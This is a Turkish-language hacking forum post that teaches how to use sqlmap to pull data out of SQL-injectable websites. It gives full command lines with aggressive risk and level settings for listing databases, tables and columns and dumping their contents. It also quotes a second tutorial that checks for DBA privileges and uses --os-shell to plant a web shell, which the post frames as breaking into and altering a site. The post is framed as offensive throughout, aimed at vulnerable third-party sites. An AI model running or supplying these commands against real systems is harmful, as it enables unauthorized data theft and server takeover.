Merhaba Arkadaşlar
Sqlmap kullananlar iyi bilmektedirler ki bazı veritabanları çekimi çok zor oluyor hangi parametreyi eklesek bir fayda sağlamıyordu.
Biz bu konumuzda o sıradan parametrelere birkaçtane daha ekleyerek çekilemez dediğimiz ama açık var nasıl oluyor diye afkurduğumuz sql injectionlu siteleri çok kolay çekebilen komutumuzu göstereceğim.
Ekstradan kullanıdğımız parametreler:
Kod:
-risk=3
--level=5
--random-agent
--user-agent
-v3
--batch
--threads=10
Bu parametrelerin açıklamalarını sqlmap.py --help parametresiyle öğrenmeniz mümkün.
Veritabanı çekmek için
Kod:
sqlmap.py -u turkhackteam.org/test.php?id=1 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs
Tablo çekmek için
Kod:
sqlmap.py -u turkhackteam.org/test.php?id=1 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 -D Veritabani --tables
Kolon çekmek için
Kod:
sqlmap.py -u turkhackteam.org/test.php?id=1 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 -D Veritabani -T Tablo --columns
Veri çekmek için
Kod:
sqlmap.py -u turkhackteam.org/test.php?id=1 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 -D Veritabani -T Tablo -C Kolon --dump
Birde 'AdrenaLiN hocamızın fazla ilgi görmeyen / Windows Üzerinden SQLMAP İle Shell Atmak / 'AdrenaLiN / Stajyer konusunuda eklemek istiyorum buraya.
- SQLMAP İLE SHELL ATMAK -
Sqlmap'in birkaç parametresi ile siteye sızmak ve değişim sağlamak artık daha kolay. Nasıl mı ? Hadi başlayalım.
1. İlk olarak sitemizi belirliyoruz. Örn:
Kod:
http://www.site.com/show.php?id=184
ilkinden biraz daha farklı komutlarımızı giriyoruz.
Kod:
sqlmap -u "site.com/show.php?id=184" --current-user --is-dba
"current user is DBA : True"
kodunu görürsek bilin ki daha da yaklaştık siteye sızmaya
Kod:
sqlmap -u "www.sqlaciklisite.com/php?id=" --os-shell
Kodlama dilini de seçtikten sonra size shell dosyasının bulunduğu bir link verecektir.